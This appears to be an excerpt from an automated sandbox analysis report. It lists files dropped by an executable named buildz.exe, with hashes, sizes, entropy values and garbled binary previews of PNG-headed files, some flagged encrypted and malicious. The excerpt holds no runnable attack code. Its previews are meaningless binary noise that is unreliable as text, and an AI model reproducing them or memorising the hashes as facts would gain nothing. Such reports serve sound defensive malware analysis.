                        SSDEEP:6:QGsCydc6YeKSxOEWGx9QqLpwlA55BFzHjyVEtMmJUOK6kWLvfUXMr8FGcii96Z:QGZydc6YGobGAqLpwOnBxIEykUOKBWzT
                        MD5:1427D5ABC4E2239CECD6212F9FA4918F
                        SHA1:96FF41C96621349186D7264C1BA8EDB2F4542F00
                        SHA-256:200EC425008948F972C3CAA6B58AEDEE6F62F85E70BAB41A57185468ED3A3F41
                        SHA-512:C68E1F52AF201267D27DD74CE50C2C2E0C45D9895349CE3522F33397C989BF56B399CDA3024DC59E36F89B3AEE8CC957F2D568A8AA606B26157EA790CB5E4980
                        Malicious:false
                        Preview:.On.!<m#..?7.`..C.d....._y...7......j.....u.{.)...?....\Q..m.-.26...........n.=\.....U.,.t\...RFBu*T......a.:#%s..5..7u.n..N..O.F3....j..%9..8N..<q......{I..CG.1.Rj.n..\..8......[..i.V.].g....C.N.^.....t.........7|V..t..g1!#.}..u....~F.`....[.(..D.G!...5....y.....S6.@.....t.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8296
                        Entropy (8bit):7.979043959943926
                        Encrypted:false
                        SSDEEP:192:IMUtOStj/qO/RTPn/7Q3KcPwyi6Rpk6M/PJMTA:RaOqj/qO/BzQ6Mi6Rp3tA
                        MD5:310B402DE3380E88CFCCFF9B1AED3050
                        SHA1:FFEFF59EDFB5E20EBB04C298D39672E6161CFB76
                        SHA-256:82B9150CFA10AB48520E9C48B9BAED9F4EB93D6FA8AB8E42E175E3EA48ECB97E
                        SHA-512:FBE6939FFA63DE9D28D1B99990C4EB759A48A2F17E43E92C90752FAB4CDF112638024C0CD454EEBD366865D3F0B93F59C6937693890C9E4ECEA8A8CF95EE8DC7
                        Malicious:false
                        Preview:.PNG.yZw.X.jH]`<Q;`G.R..:. $.fB.i...g.V..a...h...}Or.s.....H^z..6....Y.V...`w..N.o......Y.E._.v..-....w.[.4D.W..{L7...So..e3.........K..... ..w...LY=.....y4b.U_.j..&zw[_..qY..6W2U]....LP...R..P....F...N9......(....j.^>k...o.....)..eV.O.. ..2.8....F}pi..e...:.f..^...ai.....Y< ...t..............~...H..AW..W.^..H.D'S.!.%b....;./..XU..g..5L....q..........)..&.V.?p{..:VYP..xz.7...]..B8..+/.|......^{.......n...+n...3<..._zv.y..|5.$...H.!.R.<..C.. W..TA...d...l..fK.I.t"..-.Ns.B..Y...J..go...Ro.d...X.8..F....n.ES....ap#...EJ....N....i.w?.L.[.d..UP..`...15.^.&.8.X....k....K%G..vr.,..nC...A. .i{;....h.o..pK%.H...Y.'9-JS|..(.>...mZ.P1.k.|.....V0...leCfp....F.w...-.h.-..DH.y.....Z1_..0....E. .O..,../s.....VM~.Aj>t.k.;....B;.0.....0.....+u..lp..)..w..1.BA.f1j..@1o......a..ob..z..W.._....]...K%...T...9.....vD?.=..Eb..%W...0.........L...a..d.u'..^d.9...Z....O....*...f..H..L..-..b=_.4.5.'.].}.......A...7>.D..Tw(..sN.gu...s..,.j...y......7..u
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6023
                        Entropy (8bit):7.972133098044124
                        Encrypted:false
                        SSDEEP:96:652VfgZVA2Dz+LkbOboLMb44zRohZ2rrXja/zLg9BMRf09ya2kyGnagWROenPAA:TszskS8LM0vfw/+8BAMyYyGnaf4YoA
                        MD5:29E37D277F9163A150AEEBA389326815
                        SHA1:B38CC2E726DB389C6DD460A35BEFB6B2BC019F1F
                        SHA-256:A24816F418FCBA528B04F5AA6632400A8677C9750146A6B2EF3F37444469BA39
                        SHA-512:A2A4D6ED4D5E048F70C86ABE420350739D6B71A28A82EECDF5CFD1A5549C1D393896C757A99E499B1F55856BD97717D44882AF9C14A3E0E83B17FB36D239057F
                        Malicious:false
                        Preview:.PNG..>..8.z0..0z&KW>.;3_...K.ww.......`U)y&[.;...;...|c(.OO.....<U......d.... .#.rs.5E.).'....2...[.&j.G.V.91..E.^Q.X.b\l.y?bJ.k.,b..m."'mP ..*..b_..N...H...IMa..=.;...s%,4<~.;.f.M...h...9.o..+.B......U4AJ.....T..5.>..Tl.N'..m..%..RaE..{..VR.O..|).+.....x......F....~.....RH=h)C........G......{.yc.........Yr..o5>/.V._q........vO.}-.8A..z..D....*.~..v.....i;..0.L+H...J}.lQ.?I?`.z.lR...vb1..tI...n./J..Ue.=.W..{I.R*...3.J.m...._..4N....}.IWxrK....b:.+/:.*...f...f.~67..ph.....pz..3..V...?.....E7cY.9+.'..`.d9....vh4JH......."'.....g..).^].......oJDn*...5......Q.+..I.....k.]s....Y..z.......$.9...r..L..O....^..W.a..N...........*Q.s....$>.fj....Dx...~_.....\#...8[.'j....^...w.I...e2.6...`4.X9........S|........g.0..zG..Q....Z0.....[h.7|g.'....}vx.I.|H..i....6 ... n-.n2.l.M....h.D.........+..J.......j..g..rT..{P..Yb....|4.e.E3...s9@...6}q.<.#L../...2.X.f..\..Rf).Z..*.b..&<.:.m.._..4..h.,.-...`...b].....pk&r....z..(m/..H.G..x|"p+.1nq.......z.9Rgn...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19928
                        Entropy (8bit):7.990900443088981
                        Encrypted:true
                        SSDEEP:384:++2ZHDScAuHkyMqvN4OrbEyP+BH6NIcvfZohDSh+PHoKcVLWMydPA:+vhHfHkyMqvN4OHvP86ecXZo9Sh+gKcr
                        MD5:C765C32E6EB9F2F87B4D6984C9922CCA
                        SHA1:5854E687878D5F2BB7E2D1B59E86D03BE0223648
                        SHA-256:9BFD976594023BB1536AF2636F00387DC3626C7C5B2C83F4FADC6E79F6756A99
                        SHA-512:09277CF7E0E2F171309E22BC657E5736563AEF4DF07922A27D25909D1EA0A76E310515D9BE1DC1E4F9E834502E9507146E96B847FCF05B9ED3AA4FF2564DF760
                        Malicious:true
                        Preview:.PNG..8!.sA.L.$.C{a..("E.`c.Ug..Top..W..ko#...'Ax,.q-..@...]p,.@...~...^IL..;f..L..|.k......>.Up.`$.D'].n....J.s...M.........T..... .*.s..G$.........P&....S...0.(.z..wR.....0E..6Sa........e..P........).QaX..Ahq..hHs.q.n}.'[...m+. <.!R.x.+C."..=0......Z.\.x ...%...Qzk.&_.....e1S.0..U.uU6...u.e.a.w..z....nz.......8;..O.V[v2.~.v.......#....d.s..}R...=.N8.A..S#......;....|....u......A.W.v.),.\..&-C..z....TN........e..%..J.,..>C..+x0.Mx.!.5p}....0W.J.[.vw..A.4W............!J.Ld..........7..RuS2Pr1.R.=.. .9.b....<m..S...1.|~.d..Kq.....0+.o..."...U@.-...x......./....K...>,.m7.u.5.p8..}....0,p...wh...0.4.;...S.......,4#.....d.R.w....r.3%...#...X#.e...z..L.,.n..mq...*G.DG......F..u.K.....5.P....t........].x(#.>..EK.O]WV...0R.l.X......zyz.JT.#..3...==..:3j.......C....>k.h.)Y....x......T(N..Y......2[...o.0.33.............V.u.\....vOw.:..C. FBX..?6d..W....q..@.g..B...%.EK.[.Y.......m.w...J'@...`7...d...OM. ....rj-...7.%6.<.#.5..}.....W&....d.P.w<
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2150
                        Entropy (8bit):7.901256579249265
                        Encrypted:false
                        SSDEEP:48:MIafeUkoDFLT+kEx0sEOXL+lRrhXeyxscTQbVFcbUD:SfeU7FKkHsESL+lR4yxZ8bVYA
                        MD5:7893B1755EED242052A0C9EC0AC94E3D
                        SHA1:586D55C72ADD4A5C92B5D09C6ACD024E2B4A0048
                        SHA-256:8273FCF3481A7BD61BC86509C2155EBD0C82667105F37DAD28274FC965475381
                        SHA-512:27B48972A0DC9EB3E0CD482C40009689DF7B29571CB05CCAD7CF9FC565E02134F1E7FD5B0C11A5A3659DAB0827336787249B9A976C5207C56AC62DF2A5551572
                        Malicious:false
                        Preview:.PNG.....qK.W...b.T....>.BY.#X.#..ce..i..$.B...b"..Fx..1..Ec!.#....>(:*:.....F.BB#h/t.+.(p...|.....>(.yvk)..5&^B:;{u.N....%...Q5..h*]V=*..I}...'.].....d...<.v..&...^,.,..@q.(m......:.*..#...}..1.a...E&...DJA.......6.l...x.5,..].K..F7...N....N........h?H@.......t.2..1&...G7.1dU.Y.%nN..nAQ~..i.u....*..Yi9\........Fw..a.<........5....j........Ft....M..w...FK.....T.>..g,...:..E.....l4.`..[..F6)5}X]....1_v.Y....P..5...7.%{.\Mh........l..1^...PT.IO|0..#?3.f..'..W=V.RH...;....).3.P.6`..Wj...a.Q.x.J..o+..>*..ge..>S..T.k|.........q#O.T......a..P.,.r........../eh.{..uT.e@<.....K.../.`mX........G.Ol.E'.}..=*Y.c./..'.<.?..3.s.LO...5...C8X...].M.>'Z...[{..i....C...K.E..~.w..S.i....F..m.d..ua|.Q....;.`!>'.zc .......(.6.knx.W^..M......>.R......;..R.#}.~.-.......gg.(.u...1...,ys:J....u....C.Y......>.p.050?.......7..qg...Z...o....H...!K...Ag...iN....v..wT..q.3.....6...'7^.hU.O..<...d..Q...R...-......z.c.#...>...........q_E.\.......m....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3201
                        Entropy (8bit):7.936717421894267
                        Encrypted:false
                        SSDEEP:48:vt48c9tKpfD51QLdQ65r3iMeI/Pssv9Lan1lKdzXWeLLqQrOHD/axeA8FJqsPUD:vt4nKJ5Odp5WMJsGaeNXWeCQCHDrysPA
                        MD5:40F480C4654B243899180D638C08674A
                        SHA1:3E3281C2F056C7151A9ECED7F4BFE75B02939026
                        SHA-256:C8DDA6A0F8087B84F75A6D7088F1F0C2EBFF2665EC3B2BB6C331928F078D2908
                        SHA-512:20A56686A62C425B495B625AB82D00CDB0A2828BD6E7AE76ED7E38FCDE1C14DEEE0481DCF21DF08CE5E4AAED33FAC02EEA12930639423D8B1A18CB13230F2629
                        Malicious:false
                        Preview:.PNG.l...x.n.s.,..#.......~X+.........F/!._.h..@0i...|.u`(.U.o...|j... 7.....v.R...G.|..h.$..v2...8$.N.q.....X..e;...Z.l* ...o...!M..N..e..2r..7.t..Ol.r Q..,...Z..^..b..{@.\.H.<...{..j......=...{......e...dY.1.....9....V...".Nh.....}.r...^....\..N...6.T..8.!.O..3.3"..V.(..0nu..-...;Qy.u.h.....W...e.i(m...%.",...xB.@yXj.%.D.k;pC+.T)...j.T.......f.G...o..P.R.......I,..Z.)...?]S..#'.s.....u....C..V<.M..n...._.....4.5x<...!Od.6.(s.[.T..TJ..Ut.;..Zqw.K*.. .e.~.{......z.!J...d|.*..k(p..*X....c...g.s..4..n.n..C.Ani.'5.s.4...7..M{.B]T..Ci.#..De.^.A?...T....j.I...*~....-\Ye.9R[....},.!.[...0...=..1^."..:.L..6.8..4.H.Iy..M.B...L.....H...".!...........=...g,...3 X'.n....^+.LR.0..Q...~8..EE...26S...S.e.0.cZu.%.....?k......j.8..V.....Z..e<....Y.8J...U.f#..F;....s..v.T.)....\.qvKS....q...drm..t..u......3.<?f.$.8...T..Ga..h....~..........$Fp../..3..r..-J..-......I.c....e../...... .s..6q....V[...QH.....vq..( ..\o3'...p..W.B(t..@9..Y.~....)lC...;.QM..5Q.x....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4170
                        Entropy (8bit):7.94897219480756
                        Encrypted:false
                        SSDEEP:48:RQXfoxiC96igkwICATdyGYCg+VnEu9coacO6L/Dik5YDrLxuynzgs49VWhMSICJ0:RVKoiTlYsurRSDrFjeKfIUiLvJWA
                        MD5:39C9491398C9774C2E4160C1695DACC4
                        SHA1:58FEE68E0454761E31B9CB8163E4C3409E5CE54A
                        SHA-256:A4C21C3DB3A02AFC8872687958C53C1DF0FABEF65E608F74B74FCA8A7B0D2D63
                        SHA-512:0CE5D5B9D587DAB1BB43486943FE7B568B1E050F39CA7C8A8E2FFD192B9A10658D1999F51E352CA32E2D0FDDA9CD5E7AAC29ACC6C1E70672E94FF14024CD7E55
                        Malicious:false
                        Preview:.PNG..A.q.IC'.h.Pf1.....4...['.O.Cg./..X.x...).....c....ie...y<...}^...s6..n_r.%..s..-/I.)..e....%.....'B..l.......T|../.=.o1.c.6.....i.q...r..g{.aA.#. .9.....-c.7u...Yj~+;.8i..b...+=b6<N..YF.R..K#.%X..j*.\:J........p.q.....S..R......,.w...ZZ...rHODC;U..h..s..<.o..^.W..t(......E..t.dH4.F{..".F..-B!...f^4.W.h.....x. .e...B.....g..?.`uU^..V...\X..Y.p%.9Bs1..S.S....4.N...B\...Du....Sr|.4<v..X....x.. .D.....U-).,...|.<[L<..].....2.<R>?hcRO..p...Z.].DI.....d..A..o}..........U......bQZ..kC.\...3...z.,K.....'s-.S......(..y..Mm.Z...J.$......U.H"..B\.f.AN5;.5..m..!...H...I!f.....w..!.B.......N'P..;.../9...........|s1N.6.SV.E..+\...?..I.%O(....d..W...=....d..NA..5.F..`V...[A.e.....#...`....c....>...dX............N..V$=.BT.1.7Q.R..hs"..`.q.8y.7.........D...l.....:t.J...Qp..=i.b..q&{..3z..=.j....#sI...Q.Y.($...9*..d..[.9W&.e.t..g.z...y......$}.<._L`..Lk...d.;.V.....!.m...+..r^'H`...b.n.K.<c>e..........d....j....g.`.....D.._p'...J...(...>b.}..,
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6103
                        Entropy (8bit):7.965733366192088
                        Encrypted:false
                        SSDEEP:96:bKulTwS+R0g1yPPWjGAaEOwwoPJDMNnP5am6I88CYEEq3tTITxJkSrzSycA:bjTwp0UQPoGxTwwSINP5uI882ECEn/r5
                        MD5:04FAB12C1AFB7B8DAD63F554B1FC19B1
                        SHA1:058C5D71D5FDD0972A67FABD272922F77F17EAA7
                        SHA-256:F7271633CBB86A7D6335BA665A722855A7EC759C1666641C5D2B0919B6F10DF4
                        SHA-512:8CE9126B288143062054AA9E3D5CD950EC068D3D949712D69A73B0B2B3EC9EA38D719BC98510162B721860B001EF36CE65E67CCDF841E2D049202F39013E594D
                        Malicious:false
                        Preview:.PNG.p....|.A.).YgZ.G.>.....l....#...@...;Tyt..Q..X^CCQ.fhL.7Q.c.3mA3G..H@=..d..f..J...~L.f...Q..x....U.4.".6....C./b7..A?..E.<..V....d...8I.ON..7KK?TI.1.....ewV*...#.........i.]...........-y.dE...u...q.F.Bn..t..U H...K|.c..t.uDB..............b@....].TD..y..O=M.2.2..r.. @.B......{...1.N?.....w.(..8......k.g<.....E....Q..._W...c1.-:..#^....A..@....4..x.U.U..o...m...:Kw.S.~.....{..t...i..}!...M.~....`..7N.(..J...x.T...1.h....A.G..&.I".e..<F........L. .fa.M....;S....}...n&.w4d...+.y..J.~}f...@....V$...r....<...r=v..0....D....:x..^..a..=.........4x\.......9..M~.-...ZR..xx,..*..0..e.o.$nT.i.Ql.....~ V...T...L3..<....9P..]P.5t.4.f.M..[dg....6..ua...eU2V.Qh:+......... . ...S2..G..b...L...L.5.JH2/.. ,..r.<.;.D...X-...^.....tk.S.......WH3'.A..?..9c.....n.>...d..[..s.&..k.-....R..D>H....3..........HP[......I.&gB.k..0)Of....Q'.+uR.g....]./ .q...=..R...RcA}.D.^+.E.h..H.,..B........iD..f.F..V....Ye8.|...7....1...h.-zY!.Z......5$] i.d.o.O.G...'T
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10398
                        Entropy (8bit):7.9841345828230015
                        Encrypted:false
                        SSDEEP:192:JUP3wmL5ZdIHtsjDhLbnYKT02yI/yt7E88SteXwc6A:GPbL5ZdIH+jDhLRk1tH8oMt6A
                        MD5:7E5CAB4A09DFA6A9CED2DA336B769597
                        SHA1:11BBE92546E7EB137225522D3B96ECCDC09AC7F6
                        SHA-256:9FA40247175CA832DA27BC3077796017AA7D9737B14C1EB55EB1A8007D6D3C71
                        SHA-512:4EC0EFB39A041CBC91C6095CD9E263595E24103188445E14B7453F1621042800F2F73E97BCF882A63F65173B9E4A35349F47AA4DE63BECD84AD9976CB06D6803
                        Malicious:false
                        Preview:.PNG....#.2T.8t,.....I.....p......T[.3.....~....b.i.o..k...[&.........>\.b(...a.v}...2wz.Ef.B..|fF5..........e<6..\T....R...e...1.$.Z....si.j0..P...}........O.....f/..6....<.b..[.....$=.V..... 5......M..Em.9.sB....+..z..:..'.q1hZ.._....K...N.9j..j.AY3..@:#8}.t..P...f........>.M9.....v.My}.B.\..g......2.........;..88......4...P|9.~-...<.E.............{..........e.h...ci......_...=..^.1.BMo..t.5.?....}.._#..8d.....J+.d..|.6.$.O..HmH?.>.m.;,.y+s/M..GL..7x.e+.s#%.~..[.].V.8Ze...X.=..Z3..R_z.<Sp..(K....e.5..+....U..g;. .Wh..~X;....6..FG.....pIw".i(.....KD.m\....B.u.D.?A.Hz.g.Rn.g].;....ayN....v.M..)I...-..U.>/..>..r.O....cV...[c.F....F.m6....;.Y..T?..Y.j...h :...O....[W".]A... .*.!8.y....!I...Y..h...g...eO.,...J.1.4.D.7Z......."....]-.8..l. ....aOy.2.^.......E.Pt....z......"G.....%.@;{.B.5.Q.uAP.K....&M5R..FUW....7[..E..`8.M....RH......UA..Rj..Vn.Lw..'N}|U..G...].e..e..\.J.e......0.....R........*^Z.}...Y..9....*.8.0#.!....~ ......b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7289
                        Entropy (8bit):7.97652777534632
                        Encrypted:false
                        SSDEEP:192:eF0U/U0oZIIb4nDgclErUxOMrskRwODtw4rTtcA:ys0oZN4Dgjr5MrbRwmQA
                        MD5:F11D69037401D279415A4BF4FC802057
                        SHA1:C3DB9113330B02820E3D2F0B3F6F7F1413CB64C3
                        SHA-256:04065748AEC0728CE87A98851B61E223EBD1661DF2791A2D9269FDB29A89A193
                        SHA-512:7D856A612FBAD73DCC388D5A47D2C2A69D2C79E581F7284AD8B30747A0D2D13E2D56C7C0FD477B522C7B954CC6005DE69E2A5934AB2383A8C6C4DC069C1A5059
                        Malicious:false
                        Preview:.PNG............l.^.nvbC..F...>{...Y..v......S.2.U.......?.E.-dnP.KEC%.."..o..B..E.y|.....^J.V.i..f..L..B.0.x9...4..............Xl"A^oZ. R'.G...'k....x5.su..E.A..@....}.j.j......yR.9~y>1UJ:.y....'o..(._..<..I.P..K..#"\......._G.l........h....7.C..<...]8.\.....1.....BZ..9P.........RB..k.a.1E{.....t.%..y.==ol.Cg9.....;.........1.<...WJ\.x..Z.......GPJ.gDM.9.T.4...5..0...J.E=..v....URE...$.."9&...B........>.k..;.cF.Q....@.5...V......&.....z..7...._........4`.%z..g'...Y...a.h.*...gnO......ls.5W.+f.....ms.L..Z.......[zK............w.5k.#C..Q=...G|.....>&.:_.......j...@P.;.S......R.#F..P...%.&. .....">.x.M.K....OP.]B3=.).h4n.....2... ..s!ERM.Z...S.w....].a...@:.(!.._NW.....|]..:.q.2.Ym.....VX|lJ...#+.....LX.....@..C..x|.o.U......X.1<.E.. ..D.J.8.JP@...Ia.......~..m.o=.In.[(BE.`f..e..........%R...~....,....;.....mq...w....*.Y...C.....Z..E..o....5Y.........*."&?.$..%R.Q.Q.]..F&.2).k..@...z)..H.Lr8....oGH./[f+.........."vug.=....\.<.G..Y..#.I@...}.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):25673
                        Entropy (8bit):7.9926452645396004
                        Encrypted:true
                        SSDEEP:768:jLTjoGqfdBOXec+GHSDT8OmsWPQuYIkAtZXZ1TtvA:wDOS2DOX3SBZXZ1JA
                        MD5:C7858895F7D7416D9BB7C629A99B0E02
                        SHA1:ED34D88AE9C00FE47E5B79FCD791297E1F619C26
                        SHA-256:3D8E7290642B5E3EC6762F3DD62B64352B490EE25D96467AFCA4D2F3FCCF6C67
                        SHA-512:416320672055899B5F3DE6B74816CA42E30A62E348353325DA1F88E2DAD1DBEDF090FDFE0CB8DE2F3D584471ED4F160A3F47728E3F08B93A3E46838787E09150
                        Malicious:true
                        Preview:.PNG.g.<.o}D....I.>..CL...Z.S..*.Q......."I.DVf..~p....j).z....273.B.E...........c.A....f.W..N,......-}<7.....?.m..?)..I.;.......x....4..I..m5.)h..?.]...O.v..0..d8...p.7.JY.AVnkCC.G}.....i.r..yEB7..}..T.s...Z.G..>N..c.s....7!.}}2o..EomQi...qOpi.".4.;F.a.*..V3...j....a.7.:.r..._...RI.vG.<..4..]x..g.B....\vu9>.....O!......?\..(U.H.3.....\....Z.L.y .t%.8.....*.8(..$..oG.c..`.-....xk6..C(R....P.B..<.^.v..}.;....`.J.k....(.L.46.!..V.4Dr@..<.w..#...)..._X.......E6.?.d...cQ..}.z.i...&..p.g.&U/...:.o.m#.XgU..U(.........rl....v0h;.gw.....6.NL.....JBNN....M....E..c....8X.....V\..j.[v..1#^]....cN.Rk/{b....4. t....7.H.......%D8...8.e;w..z..u(D.ixmZ(.I...jF..I.Y1.EWJ...{...-..9 ...^..~.!.....9a..... $#..Yj*.}d~........h.l..5a.-.p..y.y..4.95.%.y....S..dx8..-|.NH.#'.9......;/.......f..b....qQ......\.k=...../.f7....A.t.>C..e...pe.)......#...+.d..@zz.[8....r...d0$Ot..3.{.:.u.!...........G..x/.....7^\X...<...%5.t.jVC1.f..9g..T.....U.n.....7.S:+.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1823
                        Entropy (8bit):7.891902353821773
                        Encrypted:false
                        SSDEEP:24:0a3+Wm3gj5c19nkvzzvjcjqFOxA5Dd0FoGnoGW6AiPsb+RB/3IMx3C1GbD:n+FggkvvvrFduF8Gm+R9IMiUD
                        MD5:CF58A3E398E5C343DCE538162CBED15F
                        SHA1:F217887AA51B3B0E8AB724F4641F5583B22660E5
                        SHA-256:58A8BAEC867C3878960D8B3B0F913EC3EC32A37785AC98A38C9E2F394C3B569E
                        SHA-512:5EC6B91DCFBA37442A3E337FCAE0480F7EAE321B18A7E8F169A2ACF9DEBECF03963EA8CFCEA4A143CC0BE291D583627FA4822C7C8331B51FEE7BF7B4D754D142
                        Malicious:false
                        Preview:.PNG..J_(......:j.q9V|........6.w.....n....).X:.ns/.o..N....<u9qh|+`k.(.+G.]Q....D..,Y..,.#~..C. vS......}j`...........^..7...QI..j..C&......8#.X6....n..>f%......n......m.....>f.F.G..f.5yX.[%.4....F.a:...x...{{k..{S=....P(\\.+.OYS...."?..i.,...e1......Q.~....d\.....>.........,....W...yd...X..Y..gd.w...j.x..s...h|...&...3.9R...liP`vw.".E7..0tF...........n..`..:E[.... ...#.....^q|.1..4.......'d.'.%..p.i.`d.e..L[.?HE..N~.....^^.q...].<u^..........................f..ij.-v.t...J.#:...V.L...Z.AF.......%....4._.~MLM^.I..,.#..=K.C........j..}fl`H<.....2..vj..>.R...O.s......b.BR1HW..r....728..o..M.a.6H..8K..Z{{...aJ..2.:.P3>Nk];..@.....<=M..+....S.9.....j..a..}+.$.]...R.......z..~...J...`h.C...oz8d..5..QG....mzM..../h.1].=.6o..J..>........L`......^d.......n......V.\..I...A....|-a.#.]E...r.s4W.N..k.....W....b....L............0..!'6.....zH.A.`.....m./...QA,.zhG...^...};.z...[...R.7\d...\..5....8..'..mT....(.a..3.......~.>O..x....%..Q....n..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2747
                        Entropy (8bit):7.928374966787562
                        Encrypted:false
                        SSDEEP:48:D+qOhHP1dAx2N/XQGd/dcsMAsIJsQAM86pVi2Mfu7DXrFf2Z/VUD:D+/gxM/gycsDvAwp9i4DXr52Z/VA
                        MD5:97315936D567273FE8E5B1CB70082C83
                        SHA1:453AAC484EC4EB0F9FEF07989C664D9AA9FE80E2
                        SHA-256:65D6CBF7A8F5A7EBA880367686E8EDF2ADB920766F1C1B9D905443FEDA468762
                        SHA-512:F25D8C9B9F67A3219630B8B84D8C0D6F270A86CF1843C8F838952D214C90D34A01395DC29E2E4D1945E0D57323C4183543ADCCFA0ADB5896AD6FBCDB72C0A406
                        Malicious:false
                        Preview:.PNG.i......: ..s....G.4xv.$..n..S}..ju..^...A.v...e..S.N.....6#..........YM...#.7lF.~Ra.u..M.....}.......o...D..S%....$...&....../$T..6n.l....x.ObA/.9.s......K....`.>.o.F..G....E.R..e.;..F....E.a.:......6'@.zD..*w....K.[......`..3O..X..k3.Z...=.7.s...>....5..........->....>......?1.%....<.........I....q.,. .... !"UP7l....."... d9.3..\..i.-.AY..v.+.......H.'I..g.?..y7....z.$.>e.C..........^..rI;..S.S.J.ydr&.....?6&......'..|E."...Z.X......>.At.9..n?.bT....4{.l;T5...8k..W4'...X.....{".f... YM0....../kLu...j_&'...{.....q.....T...1..~mo..E.j......JS>6@.P\%Kz.........|....W..O.f.G....8.=%q.).....oj..)...'%....H...Qs.....R.......Xc...]....np" ....@.~cv.I..vH6...(.99..#pRN%.ZX.n.B....#7.s.U|..a-..j.219#5#U..D.3.k.0)....L..~mc,...~...=4t.D.....6..DF .....A.......j.7...jE.......7\...8....$..P.._V..I....ss.......<...&~rz.+.#.*...T".......D..W.J.3mf...7.)..=..5.cS.9&.O4..........1.jH!..O2.Qt..$|..T.z.L2.Sq.]..:X....rv....dvq@&'.>)......d..C...,
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4111
                        Entropy (8bit):7.953434975547311
                        Encrypted:false
                        SSDEEP:96:IjAY7wCTD1bNdcEv7KA1MLliXGFwZ2v2OQUNwK3IOErguHS409A:I1wCP1THv7KobhZ2XNxPEzy4OA
                        MD5:67A3E5DE6BF27059A371BEEAB773F957
                        SHA1:55532320596287B3CD7F160E85B3CA2CB8F8D129
                        SHA-256:8AF62B1ACD5BE070A330D8122C82B538A299FB8508EF3923913F1EF7CD42A026
                        SHA-512:49A5776F4CB29E016A98CB4DAE719C6D3F7D2C1D526390CF3D5B6D3303CE213065D2FD4E03F04F375114B9C68B1FDB49BCD4EF862D314269924E19A5382558FB
                        Malicious:false
                        Preview:.PNG../._h......\..O-.....@.V...N+.i..E..{y.......(..V...d..^x..[|...U.`...5..Q..v\Yq....p.QI..;FI....9..'....6.+..&........1 .....>Om.....g.o8.....<*.a.kr...TO...m...HL{K..i.k. ...Y.Iu...{.b.]...k..s.$1.....U.p...Tu......0..RP..C9A_..jv...[....pP.#X...g.T<\.$JQ...>F.}..2..y..<6d..<.Z...V.].%!+yU.."|$.c7\..OD.s...z.."...<^.8.z.^I$.6.../.X...+...tK.d....~E........Ztk......N..GR2i2o.....A.8B.....i.O..a....@I..h..../P....P..o.n........m.d...E...yV"+.PJ......a_.L..4.C..NQR,......d.G%.Y..~.d.,{.C.[).L..y....Q........-x..C.p..{CS..R.q.$V...l...n....X._.2b.Vh.z`..Q.<w.l5.>$..r.)%.ir.`..%..../..c..*..y..G..2.rf].........g.....{..L6..!.'."zu`@.\.}<....~..w..U......x1p.X.A.z....b....m....^..[%...F.......q.n..Fs..."?>k.#w..).........1E7r9.k;...Y8E,.f..u..K..6..AE....Y..y.W.8%*.Nr......K.<.2..G......9I6:.4.N$.N.X...r.K1..."x.<.`...O..,..l..............Z.....{.w.`w..A.(Q...7aa..aR.......N...!g..n.P..V.N.irgN,.e....Q.......h...I.Q....#..xFn.X..8.H|
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7049
                        Entropy (8bit):7.975587191489923
                        Encrypted:false
                        SSDEEP:192:zuo5ZxW28dQNpRaLgcEsehjbfjc6PYQwakUxJ9A:Co5ZompcUcEs0jfcSY2zxbA
                        MD5:5679DDDF02703D47B56070D5FE8B7165
                        SHA1:BD30B969B3247B11781BDF66B46861C77E0615A4
                        SHA-256:D1F59EB5999956727DAA99C42EBD4B15CC3985CF48233A503CD4628AF3DA6177
                        SHA-512:2CF508FF1DB708CAD2D96BD2537DE15827D268618B5F2F3C0F5D64B275AC066CD73AF87E114DC6E85CB0B72A685206D157E240EB450095BD6591CC3D0BEA6D07
                        Malicious:false
                        Preview:.PNG.B.2u......'>......;%.@...."[m^......F.`..zy.W.J..].,.b8W5.$.].5ao;..K....}.V.....5.y,.=..4..e...L...D.l.~.f..(..Q.`b...iY....`DM.......b...{r......5....Cp...)F.x.{.......E....U..?..............A.|..s.^{.....-.4p|....1.M?.!.%......Sj...C...D...2B.)..qJ.&.).+....1.+q.w*.O?...Pr......._K.........|.._...Kk4..<...}+.|..R..B..J.9.D.....wO:&.0....5.....W..K.M....An...Y............;KS.F.\0...p}.........j..I...N]v.z.c...OT......u.......9....T7.y5&[....'..1....nQ..@......B~.&.(.^?z....m......Q.^..|\...s...F7..'?...f...g......L.j.v..X.].D..htmZ..*.``.E.y.....p..J.4.P....^..Sm'.j.B. ..:...^..../...,..g.A.5.o......7........y3`t....9.C..KI.U:..f...iS+.j.X..\neq..D...1..XS.n...>..Y]3.Q{.;.==.......b:Q...11.X.6..*.$wo4......A..|.U.3.....~].m.)z..1}]f....d..............C..._..AN.=.<.Y...J..3...v~..&t]..E._r.QT....J.w.%8.. ....cM."z;.pv%....A...Z...|(.../upE..W..p&."tw..$7.....c..k;4....2..a....3.)..#....fN.../.U.Q.5....x......UT..[.].C.$
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2642
                        Entropy (8bit):7.922239336258434
                        Encrypted:false
